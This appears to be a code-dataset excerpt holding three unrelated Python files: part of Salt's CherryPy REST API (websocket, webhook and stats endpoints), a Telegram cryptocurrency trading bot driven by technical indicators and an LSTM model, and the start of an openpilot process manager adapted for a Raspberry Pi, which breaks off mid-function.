# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
'tools.websocket.on': True,
'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
'''
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new Websocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print ws.recv()
ws.close()
Above examples show how to establish a websocket connection to Salt and
activating real time updates from Salt's event stream by signaling
``websocket client ready``.
'''
# Pulling the session token from an URL param is a workaround for
# browsers not supporting CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get('token')
else:
salt_token = cherrypy.session.get('token')
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
'''
An iterator to return Salt events (and optionally format them)
'''
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=True)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if 'format_events' in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
str('data: {0}\n\n').format(salt.utils.json.dumps(data)), # future lint: disable=blacklisted-function
False
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n%s", data)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook(object):
'''
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication however not all external services can
be configured to authenticate. For this reason authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
'''
exposed = True
tag_base = ['salt', 'netapi', 'hook']
_cp_config = dict(LowDataAdapter._cp_config, **{
# Don't do any lowdata processing on the POST data
'tools.lowdata_fmt.on': True,
# Auth can be overridden in __init__().
'tools.salt_auth.on': True,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.event = salt.utils.event.get_event(
'master',
sock_dir=self.opts['sock_dir'],
transport=self.opts['transport'],
opts=self.opts,
listen=False)
if cherrypy.config['apiopts'].get('webhook_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def POST(self, *args, **kwargs):
'''
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ revision }}
{% endif %}
'''
tag = '/'.join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, 'raw_body', '')
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event({
'body': raw_body,
'post': data,
'headers': headers,
}, tag)
return {'success': ret}
class Stats(object):
'''
Expose statistics on the running CherryPy server
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def __init__(self):
if cherrypy.config['apiopts'].get('stats_disable_auth'):
self._cp_config['tools.salt_auth.on'] = False
def GET(self):
'''
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
'''
if hasattr(logging, 'statistics'):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App(object):
'''
Class to serve HTML5 apps
'''
exposed = True
def GET(self, *args):
'''
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
'''
apiopts = cherrypy.config['apiopts']
default_index = os.path.abspath(os.path.join(
os.path.dirname(__file__), 'index.html'))
return cherrypy.lib.static.serve_file(
apiopts.get('app', default_index))
class API(object):
'''
Collect configuration and URL map for building the CherryPy app
'''
url_map = {
'index': LowDataAdapter,
'login': Login,
'logout': Logout,
'token': Token,
'minions': Minions,
'run': Run,
'jobs': Jobs,
'keys': Keys,
'events': Events,
'stats': Stats,
}
def _setattr_url_map(self):
'''
Set an attribute on the local instance for each key/val in url_map
CherryPy uses class attributes to resolve URLs.
'''
if self.apiopts.get('enable_sessions', True) is False:
url_blacklist = ['login', 'logout', 'minions', 'jobs']
else:
url_blacklist = []
urls = ((url, cls) for url, cls in six.iteritems(self.url_map)
if url not in url_blacklist)
for url, cls in urls:
setattr(self, url, cls())
def _update_url_map(self):
'''
Assemble any dynamic or configurable URLs
'''
if HAS_WEBSOCKETS:
self.url_map.update({
'ws': WebsocketEndpoint,
})
# Allow the Webhook URL to be overridden from the conf.
self.url_map.update({
self.apiopts.get('webhook_url', 'hook').lstrip('/'): Webhook,
})
# Enable the single-page JS app URL.
self.url_map.update({
self.apiopts.get('app_path', 'app').lstrip('/'): App,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self._update_url_map()
self._setattr_url_map()
def get_conf(self):
'''
Combine the CherryPy configuration with the rest_cherrypy config values
pulled from the master config and return the CherryPy configuration
'''
conf = {
'global': {
'server.socket_host': self.apiopts.get('host', '0.0.0.0'),
'server.socket_port': self.apiopts.get('port', 8000),
'server.thread_pool': self.apiopts.get('thread_pool', 100),
'server.socket_queue_size': self.apiopts.get('queue_size', 30),
'max_request_body_size': self.apiopts.get(
'max_request_body_size', 1048576),
'debug': self.apiopts.get('debug', False),
'log.access_file': self.apiopts.get('log_access_file', ''),
'log.error_file': self.apiopts.get('log_error_file', ''),
},
'/': {
'request.dispatch': cherrypy.dispatch.MethodDispatcher(),
'tools.trailing_slash.on': True,
'tools.gzip.on': True,
'tools.html_override.on': True,
'tools.cors_tool.on': True,
},
}
if salt.utils.versions.version_cmp(cherrypy.__version__, '12.0.0') < 0:
# CherryPy >= 12.0 no longer supports "timeout_monitor", only set
# this config option when using an older version of CherryPy.
# See Issue #44601 for more information.
conf['global']['engine.timeout_monitor.on'] = self.apiopts.get(
'expire_responses', True
)
if cpstats and self.apiopts.get('collect_stats', False):
conf['/']['tools.cpstats.on'] = True
if 'favicon' in self.apiopts:
conf['/favicon.ico'] = {
'tools.staticfile.on': True,
'tools.staticfile.filename': self.apiopts['favicon'],
}
if self.apiopts.get('debug', False) is False:
conf['global']['environment'] = 'production'
# Serve static media if the directory has been set in the configuration
if 'static' in self.apiopts:
conf[self.apiopts.get('static_path', '/static')] = {
'tools.staticdir.on': True,
'tools.staticdir.dir': self.apiopts['static'],
}
# Add to global config
cherrypy.config.update(conf['global'])
return conf
def get_app(opts):
'''
Returns a WSGI app and a configuration dictionary
'''
apiopts = opts.get(__name__.rsplit('.', 2)[-2], {}) # rest_cherrypy opts
# Add Salt and salt-api config options to the main CherryPy config dict
cherrypy.config['saltopts'] = opts
cherrypy.config['apiopts'] = apiopts
root = API() # cherrypy app
cpyopts = root.get_conf() # cherrypy app opts
return root, apiopts, cpyopts
|
tun.py
|
#!/usr/bin/env python3
import os
import pickle
import time
import numpy as np
import talib.abstract as ta
import tensorflow as tf
import threading
from random import randint
from pandas import DataFrame, Series
from sklearn.preprocessing import MinMaxScaler
from keras.models import load_model
from telegram import ParseMode
RETRY_LIMIT = 10
TIME_FRAMES = ['1h', '2h', '4h', '6h', '8h']
SAVE_FILE = '{}/buy_prices.dict'.format(os.path.dirname(os.path.abspath(__file__)))
MODEL_FILE = '{}/lstm.h5'.format(os.path.dirname(os.path.abspath(__file__)))
class Tun(object):
def __init__(self, exchange):
self.exchange = exchange
self.model = load_model(MODEL_FILE)
self.graph = tf.get_default_graph()
self.exchange.load_markets(reload=True)
def save_buy_price(self, symbol, buy_price):
try:
with open(SAVE_FILE, 'rb') as f:
buy_prices = pickle.load(f)
except Exception:
buy_prices = {}
buy_prices[symbol] = buy_price
with open(SAVE_FILE, 'wb') as f:
pickle.dump(buy_prices, f)
def get_buy_price(self, symbol):
try:
with open(SAVE_FILE, 'rb') as f:
buy_prices = pickle.load(f)
except Exception:
buy_prices = {}
if symbol in buy_prices:
return buy_prices[symbol]
return 0
def recharge_fee(self, fee, quote):
symbol = '{}/{}'.format(fee, quote)
last_price = self.exchange.fetch_ticker(symbol)['last']
min_cost = self.exchange.market(symbol)['limits']['cost']['min']
amount = min_cost // last_price + 1
if self.exchange.fetch_balance()['free'][fee] < amount:
self.exchange.create_market_buy_order(symbol, amount)
def price_calculate(self, symbol):
s = self.exchange.market(symbol)
order_book = self.exchange.fetch_order_book(symbol)
buy_price = round(order_book['bids'][0][0] + s['limits']['price']['min'] * randint(2, 5), s['precision']['price'])
sell_price = round(order_book['asks'][0][0] - s['limits']['price']['min'] * randint(2, 5), s['precision']['price'])
return buy_price, sell_price
def order_status(self, order_id, symbol):
order = self.exchange.fetch_order(order_id, symbol)
status = order['status']
filled = order['filled']
remaining = order['remaining']
if status == 'open' and filled > 0:
status = 'parted'
return status, filled, remaining
def buy(self, symbol, budget, update, retry=0):
retry += 1
if retry > RETRY_LIMIT:
return
s = self.exchange.market(symbol)
buy_price, sell_price = self.price_calculate(symbol)
amount = round(budget / buy_price // s['limits']['amount']['min'] * s['limits']['amount']['min'],
s['precision']['amount'])
if amount == 0 or amount * buy_price < s['limits']['cost']['min']:
return
update.message.reply_text(
'%s buy amount:%.8f price:%.8f total:%.8f' % (symbol, amount, buy_price, amount * buy_price))
order = self.exchange.create_limit_buy_order(symbol, amount, buy_price)
time.sleep(1)
order_id = order['id']
wait = 0
while True:
status, filled, remaining = self.order_status(order_id, symbol)
if status == 'open':
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.buy(symbol, budget, update, retry)
break
else:
time.sleep(1)
continue
elif status == 'parted':
update.message.reply_text('%s buy partially filled, amount:%.8f' % (symbol, filled))
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.save_buy_price(symbol, buy_price)
self.buy(symbol, remaining * buy_price, update, retry)
break
else:
time.sleep(1)
continue
elif status == 'closed':
update.message.reply_text('%s buy filled, amount:%.8f' % (symbol, amount))
self.save_buy_price(symbol, buy_price)
else:
update.message.reply_text('%s buy failed, status:%s' % (symbol, status))
self.exchange.cancel_order(order_id, symbol)
break
def sell(self, symbol, update):
s = self.exchange.market(symbol)
buy_price, sell_price = self.price_calculate(symbol)
balance = self.exchange.fetch_balance()
amount = round(balance['free'][s['base']] // s['limits']['amount']['min'] * s['limits']['amount']['min'],
s['precision']['amount'])
if amount == 0 or amount * sell_price < s['limits']['cost']['min']:
return
update.message.reply_text(
'%s sell amount:%.8f price:%.8f total:%.8f' % (symbol, amount, sell_price, amount * sell_price))
order = self.exchange.create_limit_sell_order(symbol, amount, sell_price)
time.sleep(1)
order_id = order['id']
wait = 0
while True:
status, filled, remaining = self.order_status(order_id, symbol)
if status == 'open':
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
time.sleep(1)
self.sell(symbol, update)
else:
time.sleep(1)
continue
elif status == 'parted':
update.message.reply_text('%s sell partially filled, amount:%.8f' % (symbol, filled))
wait += 1
if wait > RETRY_LIMIT:
self.exchange.cancel_order(order_id, symbol)
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
update.message.reply_text('%s possible profit: %.8f `%.2f%%`' %
(symbol, (sell_price - buy_price) * filled,
(sell_price / buy_price - 1) * 100), parse_mode=ParseMode.MARKDOWN)
time.sleep(1)
self.sell(symbol, update)
else:
time.sleep(1)
continue
elif status == 'closed':
update.message.reply_text('%s sell filled, amount:%.8f' % (symbol, amount))
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
update.message.reply_text('%s possible profit: %.8f `%.2f%%`' %
(symbol, (sell_price - buy_price) * amount,
(sell_price / buy_price - 1) * 100), parse_mode=ParseMode.MARKDOWN)
else:
update.message.reply_text('%s sell failed, status:%s' % (symbol, status))
self.exchange.cancel_order(order_id, symbol)
break
def clean_sell(self, symbol):
s = self.exchange.market(symbol)
min_amount = s['limits']['amount']['min']
precision = s['precision']['amount']
min_cost = s['limits']['cost']['min']
amount = round(self.exchange.fetch_balance()['free'][s['base']] // min_amount * min_amount, precision)
last_price = self.exchange.fetch_ticker(symbol)['last']
if amount == 0 or amount * last_price > min_cost:
return
self.exchange.create_market_sell_order(symbol, amount)
def get_values(self, symbol, amount):
s = self.exchange.market(symbol)
ticker = self.exchange.fetch_ticker(symbol)
quote_value = ticker['last'] * amount
usdt_value = self.exchange.fetch_ticker('{}/USDT'.format(s['quote']))['last'] * quote_value
return ticker['last'], ticker['change'], quote_value, usdt_value
def balance(self, quote, update):
self.exchange.load_markets(reload=True)
balance = self.exchange.fetch_balance()['total']
quote_total = 0
usdt_total = 0
text = 'Your account balance: \n'
text += '%s amount: %g \n' % (quote, balance[quote])
for base in sorted(balance.keys()):
symbol = '{}/{}'.format(base, quote)
try:
s = self.exchange.market(symbol)
except Exception:
continue
min_amount = s['limits']['amount']['min']
min_cost = s['limits']['cost']['min']
amount = balance[base]
if amount < min_amount:
continue
price, change, quote_value, usdt_value = self.get_values(symbol, amount)
if quote_value < min_cost:
thread = threading.Thread(target=self.clean_sell, args=(symbol,))
thread.start()
else:
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
profit = (price / buy_price - 1) * 100
else:
profit = 0
text += '%s amount: %.4f, price: %.8f, value(%s): %.4f, value(USDT): %.2f, ' \
'change(24h): %.2f%%, profit: `%.2f%%` \n' % \
(base, amount, price, quote, quote_value, usdt_value, change, profit)
quote_total += quote_value
usdt_total += usdt_value
quote_total += balance[quote]
usdt_total += balance[quote] * self.exchange.fetch_ticker('{}/USDT'.format(quote))['last']
text += 'Total in %s: %.8f, in USDT: %.2f' % (quote, quote_total, usdt_total)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
def crossed(self, series1, series2, direction=None):
if isinstance(series1, np.ndarray):
series1 = Series(series1)
if isinstance(series2, int) or isinstance(series2, float) or isinstance(series2, np.ndarray):
series2 = Series(index=series1.index, data=series2)
if direction is None or direction == "above":
above = Series((series1 > series2) & (
series1.shift(1) <= series2.shift(1)))
if direction is None or direction == "below":
below = Series((series1 < series2) & (
series1.shift(1) >= series2.shift(1)))
if direction is None:
return above or below
return above if direction is "above" else below
def crossed_above(self, series1, series2):
return self.crossed(series1, series2, "above")
def crossed_below(self, series1, series2):
return self.crossed(series1, series2, "below")
def st_signal(self, symbol, stop_loss, take_profit):
s = self.exchange.market(symbol)
if self.exchange.fetch_balance()['total'][s['base']] > s['limits']['amount']['min']:
buy_price = self.get_buy_price(symbol)
if buy_price > 0:
sell_price = self.exchange.fetch_ticker(symbol)['last']
if (sell_price / buy_price - 1) * 100 <= stop_loss:
return 'STOP LOSS'
if (sell_price / buy_price - 1) * 100 >= take_profit:
return 'TAKE PROFIT'
return 'neutral'
def ta_signal(self, symbol, time_frame):
data = self.exchange.fetch_ohlcv(symbol, time_frame)
df = DataFrame(data, columns=['time', 'open', 'high', 'low', 'close', 'volume'])
df.set_index('time', inplace=True, drop=True)
df['rsi'] = ta.RSI(df)
df['adx'] = ta.ADX(df)
df['plus_di'] = ta.PLUS_DI(df)
df['minus_di'] = ta.MINUS_DI(df)
df['fastd'] = ta.STOCHF(df)['fastd']
df.loc[
(
(df['rsi'] < 35) &
(df['fastd'] < 35) &
(df['adx'] > 30) &
(df['plus_di'] > 0.5)
) |
(
(df['adx'] > 65) &
(df['plus_di'] > 0.5)
),
'buy'] = 1
df.loc[
(
(
(self.crossed_above(df['rsi'], 70)) |
(self.crossed_above(df['fastd'], 70))
) &
(df['adx'] > 10) &
(df['minus_di'] > 0)
) |
(
(df['adx'] > 70) &
(df['minus_di'] > 0.5)
),
'sell'] = 1
buy_signal, sell_signal = df.iloc[-1]['buy'], df.iloc[-1]['sell']
if buy_signal == 1:
return 'BUY'
elif sell_signal == 1:
return 'SELL'
return 'neutral'
def dl_signal(self, symbol, time_frame):
data = self.exchange.fetch_ohlcv(symbol, time_frame)
df = DataFrame(data, columns=['time', 'open', 'high', 'low', 'close', 'volume'])
df.set_index('time', inplace=True, drop=True)
df.replace({0: np.nan}, inplace=True)
df['price'] = df[['open', 'high', 'low', 'close']].mean(axis=1)
df['price_change'] = df['price'].pct_change()
df['volume_change'] = df['volume'].pct_change()
df = df.assign(**{'volatility': lambda x: (x['high'] - x['low']) / x['open']})
df = df.assign(**{'convergence': lambda x: (x['open'] - x['close']) / (x['high'] - x['low'])})
df = df.assign(**{'predisposition': lambda x: 1 - 2 * (x['high'] - x['close']) / (x['high'] - x['low'])})
df.dropna(axis=0, how='any', inplace=True)
sc = MinMaxScaler(feature_range=(-1, 1))
input_data = sc.fit_transform(df[['price_change', 'volume_change', 'volatility', 'convergence', 'predisposition']])
if len(input_data) >= 5:
output_data = input_data[:, 0]
mean = np.mean(output_data, axis=0)
last_change = output_data[-1] - mean
with self.graph.as_default():
predict_change = self.model.predict(np.array([input_data[-5:]]), batch_size=1)[0][0] - mean
if last_change < 0 < .1 < predict_change:
return 'BUY'
elif last_change > 0 > -.1 > predict_change:
return 'SELL'
return 'neutral'
def scan(self, quote, update, time_frames=TIME_FRAMES, stop_loss=-5, take_profit=5, auto_st=False):
self.exchange.load_markets(reload=True)
balance = self.exchange.fetch_balance()['total']
symbols = []
for base in balance.keys():
amount = balance[base]
symbol = '{}/{}'.format(base, quote)
try:
if amount >= self.exchange.market(symbol)['limits']['amount']['min']:
symbols.append(symbol)
except Exception:
continue
for symbol in self.exchange.symbols:
if symbol.split('/')[1] == quote:
time.sleep(0.1)
change = self.exchange.fetch_ticker(symbol)['change']
if change > 0 or symbol in symbols:
if symbol in symbols:
st = self.st_signal(symbol, stop_loss, take_profit)
else:
st = 'neutral'
tas = []
dls = []
ta_text = ''
dl_text = ''
score = 0
for time_frame in time_frames:
time.sleep(0.1)
t = self.ta_signal(symbol, time_frame)
d = self.dl_signal(symbol, time_frame)
tas.append(t)
dls.append(d)
ta_text += '{}: {}, '.format(time_frame, t)
dl_text += '{}: {}, '.format(time_frame, d)
if t == 'BUY':
score += 1
elif t == 'SELL':
score += -1
if d == 'BUY':
score += 1
elif d == 'SELL':
score += -1
if score > 0:
text = '`+++ BUY +++` \n%s change(24h): %.2f%% \n' \
'TA signal: %s \nDL signal: %s \nScore: `%d%%`' % \
(symbol, change, ta_text, dl_text, score / len(time_frames) / 2 * 100)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
elif symbol in symbols and (st != 'neutral' or score < 0):
text = '`--- SELL ---` \n%s change(24h): %.2f%% \n' \
'ST signal: %s \nTA signal: %s \nDL signal: %s \nScore: `%d%%`' % \
(symbol, change, st, ta_text, dl_text, score / len(time_frames) / 2 * 100)
update.message.reply_text(text, parse_mode=ParseMode.MARKDOWN)
|
manager.py
|
#!/usr/bin/env python3.5
# manager will start all requird processes (Python, C, C++)
# for testing see also https://medium.com/@comma_ai/open-sourcing-openpilot-development-tools-a5bc427867b6
import os
import sys
import fcntl
import errno
import signal
import subprocess
#import logging
#instead of setting the PYTHONPATH, it is better to set it here:
sys.path.append("/home/pi/openpilot")
from common.basedir import BASEDIR
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode("utf-8"))
except (OSError, IOError):
pass
os._exit(os.wait()[1])
# update NEOS routine
# not required on Rpi
if __name__ == "__main__":
neos_update_required = os.path.isfile("/init.qcom.rc") \
and (not os.path.isfile("/VERSION") or int(open("/VERSION").read()) < 8)
if neos_update_required:
# update continue.sh before updating NEOS
if os.path.isfile(os.path.join(BASEDIR, "scripts", "continue.sh")):
from shutil import copyfile
copyfile(os.path.join(BASEDIR, "scripts", "continue.sh"), "/data/data/com.termux/files/continue.sh")
# run the updater
print("Starting NEOS updater")
subprocess.check_call(["git", "clean", "-xdf"], cwd=BASEDIR)
os.system(os.path.join(BASEDIR, "installer", "updater", "updater"))
raise Exception("NEOS outdated")
elif os.path.isdir("/data/neoupdate"):
from shutil import rmtree
rmtree("/data/neoupdate")
unblock_stdout()
import glob
import shutil
import hashlib
import importlib
import subprocess
import traceback
from multiprocessing import Process
import zmq
from setproctitle import setproctitle #pylint: disable=no-name-in-module
from common.params import Params
import cereal
ThermalStatus = cereal.log.ThermalData.ThermalStatus
from selfdrive.services import service_list
from selfdrive.swaglog import cloudlog
import selfdrive.messaging as messaging
from selfdrive.registration import register
from selfdrive.version import version, dirty
import selfdrive.crash as crash
from selfdrive.loggerd.config import ROOT
cloudlog.info('Cloudlog info level is activated')
# comment out anything you don't want to run
# compilation in orb is an issue because it uses screen functions and an include file that is not available in headless env
# loggerd is compiled stuff so dont run it, its only logging anyway...
# gpsd replaced by gps.py
# and geofgence added
managed_processes = {
"thermald": "selfdrive.thermald",
# "uploader": "selfdrive.loggerd.uploader",
"controlsd": "selfdrive.controls.controlsd",
"radard": "selfdrive.controls.radard",
# "ubloxd": "selfdrive.locationd.ubloxd",
# "mapd": "selfdrive.mapd.mapd",
# "loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
# "tombstoned": "selfdrive.tombstoned",
# "logcatd": ("selfdrive/logcatd", ["./logcatd"]),
# "proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": "selfdrive.boardd.boardd", # use python version
# "boardd": ("selfdrive/boardd", ["./boardd"]), # use python version
"pandad": "selfdrive.pandad",
# "ui": ("selfdrive/ui", ["./start.sh"]),
"calibrationd": "selfdrive.locationd.calibrationd",
# "visiond": ("selfdrive/visiond", ["./visiond"]),
# "sensord": ("selfdrive/sensord", ["./sensord"]),
# "gpsd": ("selfdrive/sensord", ["./gpsd"]),
"gpsd": "selfdrive.sensord.gps",
"geofence": "selfdrive.sensord.geofence",
# "orbd": ("selfdrive/orbd", ["./orbd_wrapper.sh"]),
# "updated": "selfdrive.updated",
}
android_packages = ("ai.comma.plus.offroad", "ai.comma.plus.frame")
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing visiond sometimes causes page table corruption
unkillable_processes = ['visiond']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
persistent_processes = [
'thermald',
'logmessaged',
'logcatd',
'tombstoned',
'uploader',
'ui',
'gpsd',
'geofence',
'updated',
]
car_started_processes = [
'controlsd',
'loggerd',
'sensord',
'radard',
'calibrationd',
'visiond',
'proclogd',
'ubloxd',
'orbd',
'mapd',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
# ****************** process management functions ******************
def launcher(proc, gctx):
try:
# import the process
mod = importlib.import_module(proc)
# rename the process
setproctitle(proc)
# exec the process
mod.main(gctx)
except KeyboardInterrupt:
cloudlog.warning("child %s got SIGINT" % proc)
except Exception:
# can't install the crash handler becuase sys.excepthook doesn't play nice
# with threads, so catch it here.
crash.capture_exception()
raise
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
# native processesmay fail
try:
os.execvp(pargs[0], pargs)
except OSError:
cloudlog.info("Warning: native process not started: " + pargs[0] + " in directory " + cwd)
def start_managed_process(name):
if name in running or name not in managed_processes:
# cloudlog.info("name not in managed processes: %s" % name)
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc, gctx))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# import this python
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
else:
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
# strange, why try again ?? comment out
